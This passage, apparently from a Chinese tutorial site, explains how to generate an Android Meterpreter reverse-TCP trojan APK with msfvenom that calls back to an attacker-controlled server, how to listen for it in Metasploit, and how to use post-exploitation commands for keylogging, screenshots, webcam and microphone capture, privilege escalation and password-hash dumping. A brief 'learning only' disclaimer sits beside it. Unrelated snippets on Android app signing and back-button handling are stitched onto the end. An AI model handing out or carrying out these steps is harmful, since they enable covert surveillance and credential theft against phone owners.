進入
進入
msfvenom -p android/meterpreter/reverse_tcp lhost=伺服器的ip(上面ping伺服器得到的ip) lport=34611(上面伺服器的埠號) r > /root/apk.apk
34611是設定的埠,顯示這個說明已經生成木馬成功了,如圖:
6.啟動msf。msfconsole 然後輸入命令:
use exploit/multi/handler //載入模組
set payload android/meterpreter/reverse_tcp //選擇payload
修改ip與埠
exploit //開始監聽等待木馬響應
下面是一些木馬的常用命令:
enumdesktops -->列出所有可訪問的桌面和視窗站(窗體列表)
getdesktop -->得到當前的meterpreter桌面
idletime -->返回秒遠端使用者已經閒置數量
keyscan_start -->開始捕獲擊鍵(開始鍵盤記錄)
keyscan_stop -->停止捕獲擊鍵(停止鍵盤記錄)
screenshot -->抓取互動式桌面截圖(當前操作介面截圖一張)
setdesktop -->改變meterpreters當前桌面
uictl -->控制一些使用者介面元件(獲取鍵盤、滑鼠控制權)
使用uictl -h 檢視幫助(開啟/關閉,鍵盤/滑鼠)
攝像頭:stdapi: webcam commands(攝像頭命令)
record_mic -->x秒從預設的麥克風record_mic音訊記錄(音訊錄製)
webcam_list -->單攝像頭(檢視攝像頭列表)
webcam_snap -->採取快照從指定的攝像頭(攝像頭拍攝一張**)
其他命令操作
getsystem -->獲取高許可權
hashdump -->獲取當前使用者hash
metasploit安卓木馬
僅供學習使用,禁止非法使用 1.生成木馬程式msfvenom p android meterpreter reverse tcp lhost 本機ip lport 本機埠 r 儲存路徑 檔名.apk這裡我們使用了反射型tcp,讓目標主機連線我們,有時攻擊伺服器時這種方法可以很好的繞過防火牆。3.開啟...
安卓app公升級之安卓app簽名
2.使用者自定義的方式簽名 簽名是安卓的公升級的必須要求 載掉舊版本才能安裝新版本,即讓使用者把舊版本卸在裝新的,這樣使用者體驗肯定就不好了。使用者自定義的方式簽名具體流程如下 1 滑鼠右鍵單機專案,選擇export,出如下視窗 之後就按步驟要求就可以匯出乙個已經通過自定義密匙簽名的安卓apk和密匙...
安卓之返回按鈕
要響應安卓的返回按鈕,只需新增如下 protected void dialog builder.setnegativebutton 取消 new android.content.dialoginte ce.onclicklistener builder.create show override pu...